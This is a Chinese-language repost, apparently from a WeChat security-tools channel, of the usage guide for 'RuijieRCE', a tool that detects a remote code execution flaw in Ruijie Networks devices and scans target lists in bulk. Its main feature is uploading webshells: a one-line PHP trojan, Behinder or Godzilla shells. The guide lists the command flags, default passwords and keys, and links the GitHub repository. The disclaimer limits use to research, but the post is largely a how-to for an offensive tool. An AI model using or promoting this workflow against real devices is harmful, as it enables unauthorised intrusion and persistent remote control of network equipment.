\
Ruijie Networks RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。同时也可以上传冰蝎马或者哥斯拉马。批量检测支持并发。
Usage of ./RuijieRCE:-f string导入.txt文件批量扫描-k string写入shell密钥,一句话马默认为cmd,哥斯拉马默认为key,冰蝎马没有密钥-n string写入shell默认一句话马🐎,B冰蝎马,G哥斯拉马-p string写入shell密码,一句话马默认为cmd,哥斯拉马默认为pass,冰蝎马默认为rebeyond-u string目标URL
检测到漏洞后生成随机数.php文件执行命令,也可以上菜刀。
上传一句话木马
GET密码:cmd POST密码:cmd
./RuijieRCE -u http://127.0.0.1:4430设置密码
-n参数为POST密码,-p参数为GET密码 这两个参数缺省时均为cmd,可以只设置一个或者同时都设置
./RuijieRCE -u http://127.0.0.1:4430 -n asd -p zxc上传冰蝎马
默认密钥为rebeyond,也可以使用-p参数修改
./RuijieRCE -u http://127.0.0.1:4430 -n B -p rebeyond上传哥斯拉马
哥斯拉加密器使用BASE64,默认密码为pass,密钥为key
./RuijieRCE -u http://127.0.0.1:4430 -n G -p pass -k key批量测试
批量测试时也可以设置上传冰蝎马、哥斯拉马以及自定义密码
./RuijieRCE -f url.txt· 下載
https://github.com/1ight-2020/RuijieRCE
原文始发于微信公众号(Web安全工具库):锐捷RCE漏洞检测工具 -- RuijieRCE(2月26日更新)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论